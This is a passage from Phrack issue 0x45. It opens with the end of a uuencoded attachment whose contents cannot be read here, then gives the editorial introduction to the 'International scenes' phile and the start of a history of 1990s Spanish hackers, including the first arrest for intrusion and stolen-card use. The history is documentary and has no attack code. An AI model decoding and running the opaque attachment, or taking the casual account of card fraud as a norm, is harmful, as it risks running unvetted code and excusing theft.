MWXX1>'/P#Y_-`<5P'TQO.$%Y/_5(?[C4WMN.3P(7-P?E'6JN@8HOP*L7()A6
M!`$PX`]!DEZ06(!0P8]C>`O'0KPG5"6YG\C_`\?0/M#"Y7(@5O('%8_DW`,=
M[=!RSF02-C(I6\X<H;R$3D\#61X],,,BJ=A!0FG$K@U;+F.*^0`#>7<,9"&#
MPNX8%(0,E-TQ4'@&V[1V>GL7PO8&QXUO\<*.6CSF5.Z^S6-^Z>Y;/>;:?DFS
M,(WB_V;:B`B_M(4IB+1JZ4@*6_4>G.4PG[$8NVG8N#>_^Y:-!P2[;]IX3/%8
M7:[$F-ARO&%V96/+C]PHY=0&V9VP5O:I$A?6KLQ3)558V_5J85>6:7^C1#;H
MT<'H'LH"A"%+N%_[)<8_5OGD&]NMJ3>PL5R"R@DDP\6\M)Z^;%;"$1&(BR=L
M;,;P"626T^D>-%*5-((A`J6;#/KI$1S1K^V:/\FS+OXCD]-?*(I-U_\DI8@#
M/UC_*Q7QGVS][PF>S=J?W=ZQ/8]UZW]JJ8C;OU@@U[_#^F]!*I>S];\G>4C\
M7SQ6(?PO\M/_]=;E9>NJ7^M>1N?_N?1'F`*`,!^1_:4WEV_S\`OB[$CJ2SQ:
MA3E^7O_\ZJ81)F9SINN?K?L__FS+8UW_QX,#Z?]%194+!5C_DQ59ROK_4SQ'
M0ULWH/^0KH/:G5:=N%JF=:]3CPO_'^0VKQIMR&U:^M<N=_;LYMFL_X<;,C^+
MQ]KQ7RF1_B^72B6U5(+Q7Y'+6?]_BB=U_+_L=N*#/YOX""/L]47KZJRDHOV]
MJUZM?;Z_=^DZL%F5S/[W^Z:%"(120(XQWL\61[_PV:S_L_N9MN>QIO^K1=S9
MB?\O%25%HOY_*=O_\R3/4;W5(/OK]O>JZ-XV==0QQEW#>VEZ=4?-SS3WP\'^
M'IM&?`3</7,S^QXYVO)PZ*CXEXV%Z`R7ASC%S\/IAS@E%[@1$2*!*[%B6I\:
MFA-CRZ0F,+9L#QCC;YJEKR\"2S`H!$X^,[S.:*J-7=\%RLT7[F3T)WRQY[D<
M)1G06`$'%%94>MVZ3Z*:<W3/'<(:&_F"_[J3*::E+P^14B`R(Y0/$4Z*D@<J
M7.FT95`T7+,`+U8L#+4JDY\V$&$.>,Q!'+/NQA&';A2O[G(%;0B0=`ZIP2,U
M!4@&A]3DD;H"))=#ZO)(KP1((P[I%8]T)D`:<TAG/%+=D03B<R1.?AB*QRN(
M\`H\7B&&IXCP%!Y/8?&Z<3R,<NCW**;?<GB$DBKBI_+\^'Y6=RHBO`J/5XF5
ML\*5LR(L9X572*<DT$BGQ*DDAN+Q!.VG\^W7B+5?PY%%>#*/)\?P!.VN\^W>
MB+5[0]3N.M_NC5B[\_7#51/(DZM?-UX_7#4AGAS#*W!X!2%>(8:G<'@B_63K
M%]HT=RZP?"Y89$W7_=^<W@%.5+[GN@=O?`>4+EKUVD7.U#WG5I;>O7CY!^Q/
MAQ'&Q6DD/<+N]S>M#HZK>QU$4`KOHNP"XC&6%^;,]+;G"2RC'*4X1TJ;,W&B
M6HZC'($A3B+)"94<BRIY)JSDF;"2&[",U'$LJN.9N(X7&#;@YDXQU=CX22"B
M2+T5BN?$,7HK>/SW:[MS6S^;^?_QEQ.VX;'&_U>*Q5)T_:>`0X$L_G^2)_3_
MK_#(:6@>.<WCC6F5>V&3KR8%B>,MRX?4A+J+`1C3PTIE@G\M<0!@X)YIA,[W
MGP^VHZ,Y[E"W&.FY+$W>^:XY_E=%LHH&'SWBY.D/2$KZ0^8B/:2L_YM:A]70
M4(6@P_)^8H%?0-H(GHI4^$]14T\JRD!":J4B&\-*A>HI0E!C>,):QY'*2%&&
M$OLJ$0@&GE`X<:03X'2BJ@6U7*%((#]X6!FZ\U_*E4"&<2(&&I8)"=@^2PL<
M4-$Y*M`2!4E4_F$)T8*4*D'Y$XB4H"CB^@RUL#XE*;4^)2FQ/L.17Y+BNI(4
MDTNB*Z@RJ&`B1B"2D`@T!T=(:N+B$`6)J9(LB?I#3!]RL<;.K6W)I^H-D2JL
MPN^P-_P.;]'1(W68@W_8GB']1RH,C$%E-(04A55RB):))`9+$8(!"J$80R7L
M&:SHE(@J^D@G4@%5E-%)D>$SG,VI='&07U2$2$6$%6:@5U9(00-@&Z0?.A5=
MA%6!\@UT38`U6!Z2Z#R.-$"JBI%D$2M)/S2&0BP#E4<E!@>A]V/Z-Z45?I&6
MY2+*<[3*\H&`@RRALJKH$0[&)ARPI'D.ZNB`Z@AHDQA1U"^JC#H@HMZN/3/@
MY#FJ*)!\BB32A#E]@*31*/Q&TF+:D8LU?2[>KKE8H_E]J[A1WP+V6W>QM4)A
MG,._XMD(F_E_X<D7G\5CC?\G2\52L/X+'[K^4\K\OZ=X4M=_;B[?QM=_V,3'
MVOEQ,UOV%H[5LE"^_?J/[CD.#/NU1J/3['8AS[;:M7`_"/[=]IRI+@0=NE%(
M,ON[">`;.,`7Y8/5J%>F,=4/4?#S1ILN#``/$V9+ND@506`)7F@+"[:$<CM6
M<$YS:7KDJ$[#$67?S."PR$)(V5K,5@71G+$4^25GZV'9L\6SW?K_9RW_K5__
M+RKA^K]4)/:_I&;[?Y[D">/_*@H7VID%=I1WALL#:I""_&!U:[E:OJ*38CI6
M$]C[C4EU.[?84WN'GC__#1GZ\@6-A398_@J8K`(4G,(:8[9<*\N'@8A-QNDZ
M4UZ*&)\"UFEI'+8T#PXN/E,,BOLMS^UM\FSG_SU*_X=)/]__*ZNR7*+]/]O_
M^R3/_M[KF\M^MW;3[-<N+OI7K6[SK-,\ZZ++6KW3VM^+!/B.7(REJ+$4)992
MB*7(L12)3SGA$\*8GL_033[%C:4,YO$4;*C(3":7OHS1CZ4,8RE@W["-N`1;
M`1+%;F6OU5DG5'M.,2,)0SY!YQ,&L81Y+E89FLXE1`1#:)N(2ZEPOT^XWY&6
M(@DRGU#@$Q0^0>43BBOQ86/3'V*7-Y!6#E:"<M*KR2&29/BO+D\X:/#J.?!2
M"4`)4KW,P<])O"`@+X)TO8T@'1BU!(#E"@?X0,85$>0)!VE;/)B27"=[-$H6
MF!HKK+N8"0M!X14.?DJ#ET3X`@./!\]6HW/9;];>]J42Q<'-7#W^&=WBM'>'
MZ,'T)C"(']MSV'W\`AV7T,_'(5TRX1-08VB5-Z-5CM"J"&DUZV\#8@RM6YS\
MCL6.*-K^'KM7BNQ:NO=#S_P"@B]=AY?MPG`TV*VTLACAQB6Z?A)J(O[.BFR?
M[#EB5[A#FJ%7Q+!WO3A[U]N8/9SYQK(O)[%WO3A[&DY'V9.TS=B3?KM)[2E-
M9L\8#;?S:$3";`(3^J;L%C%*)NB?$5:@`ZA*NNT]<1U=SW8,'9D6,J+E'2[!
M3E7]MP]CP&3;D8W'`6RR,";R;&1H;.DYAS80'G$P_2H<$JJT(BNG-5X3\FM(
M9C=S?L6(/=FN9D'!HBYNM8_)M4:C/"T&F8#!1B4HB&]D&/0`(J86+2N_T@=_
M(F<CA2#7/:W5!I_BBFTP29)_#=XLC!U7B]G`\`M`\Z("U5G5``2&O`\?D%]-
MP;!;`_V89^4RL!5CZL96=1"&'D$SDM&6*4.DNN%0GPO]!*Z,!;:0_@03E#%0
M#6JV&30?AMVU^+T&-MFST;/E_N_/6@!8-_^OJ(5P_[<LE2'^4PO9_H\G>5+G
M_R%FB2\`1%(?\0V0U?[8<%:<SU*2LU04?6TTLON<3B4ALLV<`6#WAG,@/`.Z
M_YN9KK_NOFYU>@'[54XDO9&0WDQ([R:DOTI(/XN4*%)@?Z.A&"_8$Y@@S;,T
MW+,8+IL+&^K$.3V'*6NV9O&5GG7V/W:=Q&?P6#?_7Y3(_+^BE`K%8@GLOUQ0
MLO=_GN0A]K^48/^Q+]EKUGO7W6:G73MK1H<!4>8C=&(X$;R&N>SOG5NFUZ;J
M>(W5L8W5<?528)L>(=YOO?PG+A2BEWG1>P3WLY<$DY]U_3_Y=/7->:3W_X)2
M5$K^^?]P%$`1]W\EZ_]/])#^7SZ63Z(&(.W\3VY+T+,G/1N4GO_IWY%)YB]\
MD\`?F!R`TIM+TR`?H93T@^B^,,1L#$/UJ>:ZAGM$8<*3SA$]Z+S[1[?7O.S#
M":.=RQJYN+9^4>MV$9R^1:EA1\P<,A0/PYQV<"LNFXO8!Q?)'KCVU/",HZ,C
MW8`O*W3#(6C6T!"2A]NE6Z.&]E',7/,F::42YL$<1MU>6)XPMV'`H63I55U7
MZ%?@I2?RABH),R]M?3$59UW8PP]BBEU/&W[H.5I2F>$F5KC*5YA[95OI`'2'
MD#"+#G.)3&'_KS#S1I_!;>3&;"%FB?-?VG.Q7#'-NC:<)%055Z*GC85YY-YU
M9S%/://Y\*4QT>[-J!:O^"ZFTTMC9CMB+;RP-?U,-^GH+X2XMJ9K84`M:OI[
M/#+`!9'BME[,9IKS,:4HEZ;CV$X*`*.ZR4K3\KNKM$H*KW<6J[6CN9/&8C;'
MVNB):?[+<"QC2B[E'"=(H&Y;<&5IEQQC*(3`,9SI>L['WQ>VIPDAFDL/NT?^
MT8(]>O.XL"OCMC:]CUUC;CB\`OJ7>M9T/:6Y`J@.EO6]D0*X,I!)/>G"&&O#
MCRDDZ@O'@2M`L8;\V[:2+(3]`1MI/=F,=J?F_,KVX'IG7J]P^7`"W;@?2VX8
MV,1,8LGB!M*LL4'.RDH56FIF;[*P/M!VC#%-L^M<-_3QYEC)&8.WF&EA@UQJ
M<[:9C)&!]2ZA<+0\V%*F%*`#UY#/"%AWHCF&#G<5UZ;FV((>S>KYK#U=N'#P
M)3:4T<+5[C5S"FI+^[!H\+$?DLJ(32I)2AZM0Q#AL!VK;8KYO[!=KV%,M8^&
M3MP<(=!+<YPXM`0MFF*U?1#<3MA=N3&-!_$897MS+<EBT%$JN&,>C[",O-\`
MEFZ/H7,X_E[8A-P$$8QQ5YJFB_*-_5!2J3JDF#2XL]Z9/6`HWF;%RI4$F.)'
M-)>"7N:86/D2AAEL%$EG$),GFGF!2[WQ($T+<*DM5^\L$)>4.(>"9'=B+Z8Z
MTJ8/VD<7#0SD30R$<SSBL<+]*$D^:Y5U;Q>6BSN?H:/A1'-\;Q36V"-`>#Q9
M8/<\\()A):O9[;*4B1],)V:O\/A$+NMNC4:NX<$AL4`0=0P7#SF&+M\6"^\@
MM>W/[M+DPJU"4E_7KAH7371MF3B^#4R)'H<GY[)3CK3]B;\:XZ;>J@)FQ5M9
M)LG=\W\W^SW4-K0/X)&-<,-<N_@+FX>-);;YD!VRN("[UW#]>\VS9B>D6KHM
M`=%0\@(Y':*?V\FYCQ/SL%,U2>_%0.@%34^F;!*#G1@:4<7#`-5>>/W!$&34
MM^=>/@9]85AC;W*`:%O$L@^9(M"&3:`088@YH38%[Y!]`!2&@ARP:LS*(4_.
ML,*-<=7[_;K9^8-6&6I,*WSP'0ODL=X-6?_.U6,>`)K4DJCEF&/3TJ:)JG^*
MKJXO+AZG5.M[WFOLE'ZORD;O@@ED``?$>@L7RYO^[E]?=:_K8`-?75_0`]M3
M;".:8_?SGO$M5^V6C@:1@1`-3'Q0HK5*$I=G(/U<#FWVB$2>6STBB%#B43A6
MU/XU-W#>_$]7O;XOT3RMV4%POTUN;'LV@A>:I-6I[8"3-!>$?CI-4+@TDK`E
M)B[O?$K[',28T/KH-@KX0#'SU"TX4.%(?9[%\]\X;X&]I(>@0XM#C7@=BMQ-
M`(!QTIP[PYW:SQ.,P:-?1.45^$AI1_NOYW**HO<#B&]0^)P:YMOUU[5.O)EV
M4K$48\S5Q;^_`#X"0\`7Q+_-8EM=S/N5C>']LKZJ?C_\A!XFV(F$RQ]^.MT0
MB?0AN'+!W\A(^^XC79X0SH$C.(@#A3_3CQK``%N>-2#`V."P@1C61J<-"+`V
M.6Y`@+;!>0,"K$T.'!"@[?K$@3B+G1\YP"_\@E<''@SH4EILX:\%$]?CU<(:
M!L.?(!G([8<7R5U#AT2]V7SE1=[*ZCNX0T[Z%`_%@$A-UQW<X4(0<!`H&88(
MZP;X0R'T6#0S9EB]\F$9T;.[Y6B$/\K=4JW<+2OXKS&\6RH2_3XZN</"PGE%
M_'MPM]0K/AQ\UYX=(KFX&H0;@S&.)BTO_RQ%^FADPI;NX&P$!,=HSF"BY:<[
MZ]D!L8R!G1"Z4;ZI9"1Q]/M"T]N:`\-$'GPU^!RP\J92POK3ONZ^1K]>V`^H
M!A/<"\]`@3@;<++7;Q2LBEK6]"/<9.08?RY,V,.<?Y@8%GIMCB=HHDU'R(22
M6^B_AF,?O*!8EZT;=-OIMG]1WQU2<NA7@I#*J]/LX2]1#9#>D:N%2Q6H[\]Y
MZH$>_(-3$P!BQ8"K!5)(PRE2PI):4%6U7DX#/>')0U4"^EQ)%$JVK@3ZMG'K
MX*%'+E;))-"OSY]C3,$*:YYH152Y\U3E#S8X"(-R"!EL(.?MI;RQC#>6<*)\
M<_&%Y;P_.&\0"N839P362S)HW,0F`N,R_\@8EXB:8%NA'J16@'$1:-?W._ZC
MN0HK4]\S8"[SWG1-7+0D4:S&`\&5H)N&@;GKJW-XGZ??[77.<5RYL,R4]@I,
M/,K%SHX(6KL]^>C")#0_+B!_4O#_V[ORID22);[_.A%^AQIFU@<N0G,(#+-N
M!$([LG(8@+HOEGV\MFE'GDBSW>V(L['[V5]F'7US.:*S.UVA@G5D75F9=>6O
MIMUK98A,^]&E%4+H\6B<&H_NJ)B%>R!.WH(^.)X]6\VY9K[V@Z;L\3#1]1UK
MC#>M8*V#!E5="S3)Q_C.@N9)DD9L7AC3),N+&Z>%3#1O\=(KVXV'=3_T,H^R
ML``TC]%5G-8,5V[+\K,UY3(>"5M\TBFHW9A->B$`>@G'4A4;3*.#+LYKM*0H
M"=Y']NH1UYV,>(*%_.%82J;3CF:G^2HA&9,K931.<1UN[PDLKJ>(YJDM>OSI
MD6=!#J?]Y?..KU#E+>]@:-Y6QF.HCJ6U8/6/)Q9#=K01IS<+<8?<+=A<B9.$
MQJ@TZA]:2S/FD6URH2,MM$JN'&T120<-)'`_41SGK$CB<]]1M!_K"S+A:O/<
M9=5,SF5_I,Q5%-N4\4AWNA7#MG.V[8<,O?Q/U\CXRY?8CQQ#6VS&-0(I@^+;
M@;B19ME2<IY`M2<PR1`1:0<F?#MN`0WVK*O@E[[=M]PMN_]YJ]S0XZK4I7+S
MV#R6WO_.4ON?3`$F:ME]BO\@%2/[GV=Q;[9?O2&U-FFU>T2NU7ND=USODJ-Z
M0W[]^C4A\G!DD53?U.\,53-3J*<>]#MRKTPLM'-5AD.BD(EV3U@,)(;<@F'6
M-:S-5!UFG1-M8J4(Z:$'#;W5#`W7=9,AK.E4RV31-5CE*6."'$>C(3'K6K%P
MC6?28WM8JA(TS<2X#FF3Z%?42SR<VNJ16NT$DJ,H>%UO51MG-9F\C;=ZS<J)
M++?.$WV;K>F!W6NHUMOX44>6#\_JC1K(OV:W.KBH=%HP,QPTY'.Y<9"^R$!$
M)OC"0G,8^O>[#K[J^/^2/);A/Q<D<?\;X5^*WT%H;C\3C?_G<&]P,P3'\0AG
M"##\V$"F`]!$BW$ZC&\5U=!3VZ^Z[;,.Z-&#^58!Q&\PI$+B$08X5\/5/IM=
MTHOD?>_;@MS3!3C&?=Q/$'$O%RH1]PGBE*,(>$/:=];TSB)#>B&-R:")<JM!
MC=IGO0-D]A34A4WLWI##N]%X2,8CTT+)HM-[2ZQ!,,'AS]V#MW'>$N64>I""
M&`D[`#_*F+/P1XKGRG@T1(EU"1,;;"@JLU""`57#)#ODHG9BEC$JNO-N5LID
MR0_H2THIB<2;(^@`4[^R;"%73'ABY^S8F;#8X.V-O[\X?D9*4/D)40ZJY?ZI
MH7^$IB5'E"OBLU(AT1=13T:6V4=0&*0OP]K=T.DM.^"E3XHQPN6)2:[UB<X%
M>$P=I[29%B/X7$\,^NJ&_ILB78W=+KK283%P#ZM.)'C6:8#2T`T"RP&-C#RG
M!6]$C:XM:VJ6T^E;<SA)W8K*I*!]T]ID[\Y,CT>7AF(\I(NYJW=F(7L/_3.=
MK9TZ,[O^;-Y<:B+U]BNN6Z#;^;?$^[=Q:+-$O\XL(OHWMT&?OFI8?E^FX/R^
M^!YX*B/MEPHI"4EMOVK4#R$W^&OGU!A=]J&UBDAX5LBS?@BT)39D:#L2^(FU
M>K5:?<"W`V*/:EK^AGMZJ)DWECY-*TJNE"OF][_/ECX=?#)3)?CVSFFYZE&C
M\J%[D)[H8_VC3M*U0:59*^0'\,U3F`/VWT6]5<1(\)G+XE_0\:!ST:O:[34&
M5&^C_X#9@9&^O:I-?^CND72O"E\^P^\#_!Z1M'QLJB3=[&%S57QEN:#8O@U_
M"2GA\D6M22:6;MX8DW$**H_;T/33E:/<ZG7^76;77^DQ'$EWSP[95E^Y5>D!
M(9(^K'3E<DR:95`'QDBZ(S=D\()"5:K']99<_J60)^E6NR8?5<X:/>ARXL[C
MM'98IH)K.KR$PL',Y0/K^AI[6QW[&*99$Y#EQAW(NS$L_DR"=[YQX@5B6E$M
M6).F2-T2M_M0'HU!6(/<MXBJ3/YE(3U]JDV8R(S1X1\C<9#QES"N'RBL,\S-
M1I;U0#1GZ-L#GVBSJ3)!H4\LF$B82`^R4+5$R'!?R*+>VIB/8E%U)A4>S-FU
MPX4HIU%,EUF[OHU7N@G\2[L^0=(J>?LCTPH@V,]ZB3)A`I[OS0CA17:1"(0U
M1$*(7&9)6')$NIGP7(;:F*2/[#08Z>7T_[KVOVN8_=EN\?POD\EF</U7V"_F
MBOOP)[+_?487;O_[6/._5"H-/_S?-#(-%5$;L@5TC@W.+-R%Y5;!*'A\QL%T
M!USLC^'>D\*W,!$^C$YR-8+L31/H,%,\;=8:NZ0Y'"<=+R2RRV\K<5K;FS,M
MYF;6Q_\^E3OG]6Z[,ZC)Y_6J/&A5FC(AC5B_SPSD^GUG#,?"$[:[[E2ZR1*:
MOI0;[:':R*2F`8,P"^YZBW<1J4]@GGYX=W7%[ME#`+OUYPYP;JN!Z!0)V0P_
M+*4[Q)>TWA[P_<'#1KMZ`KGH;#OP<(R;^H\X5#I%<_A!][A2:U\,<+>93+&F
M84<_6\AC9`H\YO;C1T5N)G,'KWOXM.CL:=VCIV!-7)TBCO:=$XKZA,SK]"0Y
M'QG6'<M"%%F:?3_M3V))?XOM_12,[-_E#1W_\14()<D.]@!^>-K<WL=?M$<^
M]\;CF@<F(5D_Z1%)H!V8D<'$0ENHISL3V6I2ZTIZ&J9!.+0K#]C$%O]*F_PH
M"#Q#>N^G^8D"4;U'P-)[]\EX.-F-G9`+$QE'I,+7^.YIK=X]K?2JQX.CLU:5
M72[D=Q[%N6]]X@A%YL_DXIT(\%[^%<G:;F'J2=<."E,6[I>FNU-/(]GQ6/^%
MZ2E_90:ML^:AW-G*8()@7<FQK;Z$I/EU!7*_D0,FU>>*)^C%3=_39XM#40);
M"W(=+U!,J)YFAG-<J9W6.Z>D;DS7UTTH\%D754\&^-8B;4(@U9UZ+JMSC4%E
MNUMWNA0'YX1Q0"F+"\(B0E#W^F/4=11$AC[&(VQGE$&Q8/QQ]DDM&K.>B&$C
M5M"CU:SKB,[%C'C1#TWV\2"='JR"!Q=8H;6G655,4U='((:'\&^*VU8*#;@5
MWB0T<Y2ZAG*K69IAICBT@:A[*I"*$0MMON74@LF$Q#2I03>)<QI-Y7^Z(:X)
M"8VFXDN=P&6#YL^#:D>N]&0\+=VZ-#3EAI[G^N,TVEUO%%\$SM/5=JO7:3>8
M5-X*]OP*K>1.X3K'_B#WZ!@?U&MQ']T$^>E@%1'C.O+&<4H_V*-5U[@S<0NK
M1#1^O#=TW)9T8CFMPF^.VZP:(IL6E?,WP@1WD/.8@`WAK.22!.$3WZVMG;AG
MT"3$E0"[+G_Z]6O8:.3C%"IQ.T6$@H[V^QVL]9!V$E5!JSVHMX!_FG*KE_"H
MS@VKRJ<!C%I;M@:ODS'V;0$W.]/QD%BZZ8F"$MBK!:9N->"[4#SWLI:3>7+.
M&I).]^:G9\5*AJTC@Q,P8`.*6,!RC;L;D_(<A:_8\I4+O?"@613*R2E)I"0Y
MJC2Z,DOG:0%[:KZN'5*@M-V'VTM]/%(;H\F-M]+>DCXZ1W<[^*3MKQX)2Z<D
M*T5'8;MR;*_DQ<NKWFE'=%?FFW>/QG];`PAR^?T?^O[??G9?RF<+V0C_[1G=
M'/PW#@`9N*0N3(4]2)`+8WVUU\4WM&_[-[L#M/S^SV@MK,<PMWC\4]!'@?^8
MS6=RWTF90C&;B\;_<S@Z_O/I+#\`NC*4R<W@\^#SM3+YN.PHZ,=;T`@X95SC
MA,C[GJ`W+(`U[`F=KXF>%X'27A.XW]>FR`KLG(B:7'!X&9?#6`Q!)LGBPAJ$
MN@J=;0V:E>Z)B%O33#1VJZAHT>N+?LI6!8-*#Y80AV<]N4O8'+!B05=<WL'(
M3?H*$SCF\.Y>VAE0F`5RZC5UI$5D6\_0J-W19W_Y^3&+OZZ!XBR(3T&90FL;
M$IFO-&`*JYLC&U)BA21MBIIG^JO+SH_<3E;LA?02PK(B@"A6@8!A<WU<\B0B
M?HGX98,(.8Y@0DN2$&2<L'@9Z9D@=`*9!PXZ/8/%A9KB)-DHG,YJ(,-LBVC`
M'F!2#2D^H(],X;<$V2'QO^+\<E>";K%M9K=K)9#CA27]#Q'%W/B6G*?3<4(>
MB<%O70PRUH0YN#52"8U)T>^<DZ#159SY_$BDA`W6XUPS&-'5';D&;L*=>C>'
MV4`&@F3.MD!#.PZ;&`W>VW/V[?AV5ZC<B7LX<@$JDY\;;6"E$+ZSP_P<9@<$
M>,D."7"-'>+E#]L[C!-\@4Z?VP&NWG7Y.>!0&P61`>U$BEX,&:=+@K@QI7=Y
M22)YM70Y5)T.<2&SL"?G0E+E$)@EHZFE$EN<>K%C2J4@"@RF4D@NITKNSI_I
M#.42'P>DCP&&I%))_AU\YJXD?PE_O]>-(9E:!OD5"KN7D:Y_2QKA5#(248OY
M?#9?1*LY5F9!9N@B8TY_*"*9;`C\#9(I$?@+9`HE?V%\5`HEH#*G2AE1I6&`
MBJ]*V=+\*F4E7I;]9679=Y5E$6",>_AN?]T@,8LA8O(JAWQ1.?Q+AL'$E."[
M)#F_N5Q_IL)G_AV$P6\>(60DA(DIS(6)<342AX8I?!$TS'8$#O,/`H<IO-]^
M!"C,O'6(3?&;0('QK%KBWHV`^6TDNNF?`_/B4N9H+[:"-L_^=U\!C9*[E-;1
MRW:JXCIZV4[U#O.B"JA8FJ_$4*&&*#&;BO9%>EF040M?HI=M*HI=I8*TL$J%
MD*F&3>7J,7K93V68(Z7+$E#11+/85+!3?)0D&0JT4+UGI'^2?E]%IY>X3L_W
M9UGX+99B=*ROKM?SD5Z/]#K7Z_DO`GV;NW_(27];:&]KZ'EW6SV)HB=?E:;W
M6V8MM\I:;)3%!72(Q0QV&O.HZ\)"`OX7\%MQ]HSOX+3720@!L$/^<HPFR![)
M)-S(4.+BF?C`?&@ON&U;L$Z$UL:V6EDM(W&3S,;Z0B,)(;A7P=L<#"SC021H
M(J+VI5:9#!L>LXLD86\\T4=6H&$ZFL+WH1)B`VPPT.@[4G'YEZI\2F]KR+_(
MU;.>/&";L)W5B[7UXOSU,I9_G"D7FFRA'/H;\^?ND_/G+N5/[+!GXDZ4$/[.
M<>$,<L\CW8""=94KC9>PA?<+J.&1>*$L.'B]=EOKE&C77R(OK?<O.:B([U:5
MH[C<-ZDH^SX!Y*9':?I@+H.8E=R?ZEQE,@X,MQ>TD`S%TUR$ING4G"%H.O\+
MU,RP$](5D3*=I"'HF$&Z7X2(N172'S;\92`OKK171M#T$P\.0QLODU5A?9C,
M1U9[73//D(IL;P@*,Y"7W\X3-"$4D8@R"AWX:/-/3ZNS("]QU$0SJHE"3#OY
M]%[,J#>.K.FZN#6?49-A3"PP-)\"09/XJI.1W/615JV/=P?D)2OT)4)D>Q-F
MPELK&3B0M=SV\QLRH4+>N,9=5W%^.^IM;?SC0`$28A/,D9&>?A"+$IRM)QVY
MZ?:FHC-T4,\IWM>%A!NT?6;`6*O8XSF;MSYV%H\0X^/C]H(,Q^BJXP/C^FAZ
MK?:(1/[D\1;89GN6>Z'3P,4J;9$2>"V4`-G96:3\['@A^\`UF$&0>]VX,1%*
M"U6@.<U0_#VJ/LRIE%IO!QC;(WSHN^T.W1@U:%!@0Y*O9#>(-H`['G-!(8'=
M1H-GK9-6^Z+EL1@4\7;\9H/HN43+890_PB'7O84-Q5E?V'@80:BZ=)I'7=."
MA?%,>-JP=5I\4U=S7MIN(7)/X^;8_^#UT%LM9<VL)\ACB?U?)L?PWPJY7"&#
MMD!2II#)1O9_S^*.89T&,QX.14O!&2YJ)T6B&^12&^OW99!I%+&1""1HNG-*
MW+CP*7(V&8)Z,PV5,$1O?"^=0CEJ,P7A`4C,X;-^UU!A*H.F$B1VV*C%7/FG
MF'B$$I2P!,JE_HF5J6MITTP97X^>P%(2@6NGH/,1R%(4Y)L"VL7FR)9YL^,6
MMJ_IM9FFXIGG)_638IBPHH)NLCP]0EL5,@P?_WUO=_T4FU,TIS[G(_,.9JQ=
MZVXXTDDFGY+ZG]2^)_\8`VD6Y<_!NFN"O<?ZO*5;6"A94:\10YI.JWB_#8FI
M314#E-L8Z@:4+,T8\?-K;O<UW'[UTB,I<I&+7.0B%[G(12YRD8M<Y"(7N<A%
5+G*1BUSD(A>YK\?]'TMC_V(`0`8`
`
end


---[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x10 of 0x10

|=-----------------------------------------------------------------------=|
|=----------------------=[ International scenes ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[    By Various     ]=------------------------=|
|=------------------------=[ <various@nsa.gov> ]=------------------------=|
|=-----------------------------------------------------------------------=|

In this issue of your damn favorite magazine we bring you, not one, but
three international scene articles. The first is about the glorious
Spanish hacking scene. We had some very respected hackers review it and
we believe we have brought you a real gem.

For the second phile, rather than assembling information on a specific
locale in the world, we have approached some of the predominant
wargaming networks and have asked them to write up about their history
and scene. We're happy with what we have got, hopefully you are too. We
have all played wargames some time in our life, right? It's a hell of
a hard work to maintain a wargaming platform and some people are there
to do it for you, for the community.

Our third phile was a late addition due to absent minded Phrackstaff,
but a strong contribution none the less. Austin Texas seems to have a
strong lock picking scene, and jgor has thankfully written up this phile
to tell us all about it.

We would like to point out that the following articles are probably
outdated, as their original submissions date back to mid-2015, however
we believe they cover a fair deal of the, more or less, recent past and
thus are worth publishing. The Phrack Staff cannot, in any way,
guarantee the validity or the level of detail of the information presented
herein. Want to add/correct something? Mail us and we will try to
publish your side of the story as well.

Enjoy

-Phrack Staff


--[ Contents

  1 - A small historic guide of the first Spanish hackers
      The Spanish 90's Scene .................... Merce Molist & Jay Govind

  2 - Wargaming Scene Phile ..................... Steven, adc & weekend

  3 - The Austin Lockpicking Scene .............. jgor


|=[ 0x01 ]=---=[ A small historic guide of the first Spanish hackers
                 The Spanish 90's Scene - Merce Molist & Jay Govind ]=---=|


|=----------------------------------------------------------------=|
|=--=[ A short historical guide to the first Spanish hackers ]=---=|
|=---------------=[  The Spanish 90's Scene  ]=-------------------=|
|=----------------------------------------------------------------=|
|=----------------------------------------------------------------=|
|=---------------------=[ Merce Molist ]=-------------------------=|
|=--------------=[ English version: HorseRide ]=------------------=|
|=---------------------=[ hackstory.net ]=------------------------=|
|=----------------------------------------------------------------=|


= Index =

1. Old old school
2. X25 hackers
3. 29A: "I am the scene"
4. The community
5. Credits


1. Old old school

"Hi, I'm Mave
What I am going to tell you is of VITAL IMPORTANCE. YOUR FUTURE IS IN
****DANGER**** A LOT OF ****DANGER****
This morning, of January 31st 1996, at 9 in the morning, the judicial
police turned up at my home, more precisely the computer crime brigade,
and have ** ARRESTED ** me."

This is how started the message that Mave sent to his colleagues of the
Konspiradores Hacker Klub (KhK) when he had the "honour" of becoming the
first hacker arrested in Spain. He was accused of penetrating systems
belonging to the Carlos III university and of having used a stolen card in
Compuserve, which was pretty standard among hackers back then. He was
caught because of a mistake: he entered a chat channel under police
surveillance with an account under his real name.

KhK were 5 who were passionate about social engineering, meeting up in a
Madrid cafe. Along with a limited few groups and lone wolves, between the
late 80's and early 90's, they set down the bases of the Spanish hacking
community. Another member of KhK, Lester the Teacher, would later write
the first Spanish social engineering course, with those hacking pioneers
mentioned in its introduction:

"There was a time in which the Internet was only a place for survivors, a
time in which Knowledge was acquired through a lot of personal work.

A time in which respect was gained by sharing with those that didn't know,
things you had learnt with effort.

A time in which technology ceased to be magical because you learned to
read its innards and you could manage to understand it.

At that time a Hacker was one who found that no matter how much he learnt
about systems he always knew very little.

A Hacker was the one that managed to program that routine even smaller and
more beautiful.

A Hacker was he who respected the work of others that he recognized as
peers.

This is a simple and somewhat spartan page, as things were then, dedicated
to all those friends I had the fortune of finding online during that time,
and here are a few of them:

Ender Wiggins, Omaq, Akira, CenoIx, Agnus Young, D-Orb, Partyman, Quijote
AFL, Pink Pulsar, HorseRide, BlackMan/KhK, Wendigo/Khk, Mave/KhK, El
Enano, Bugman, Joker, Spanish Taste, Cain, Savage ...

As far as I can remember, I have never heard or read any of them call
themselves a hacker."(1)

The first Spanish hackers started appearing in the 70's, from the fields
of electronics and CB radio, when the word "hacker" had yet to reach
Spain. They would build their own calculators and personal computers and
worked in the few companies that used computers, such as the airline
Iberia, state investigation centres, banks and local branches of
northamerican companies. Among those few "computer nuts" Alberto Lozano
stands out as one of the few Spaniards that bought an Apple I. Some years
later he would help create the first Apple clones.

Alberto Lozano: "A Barcelona company built the Unitron, but couldn't sell
them because they contained two ROMs copyright Apple. They said to me:
Make it work without having the same ROM. I encrypted the contents of the
ROM and wrote a routine that decrypted it and placed a copy in RAM of that
Apple ROM when you turned on the Unitron. However, when you turned off the
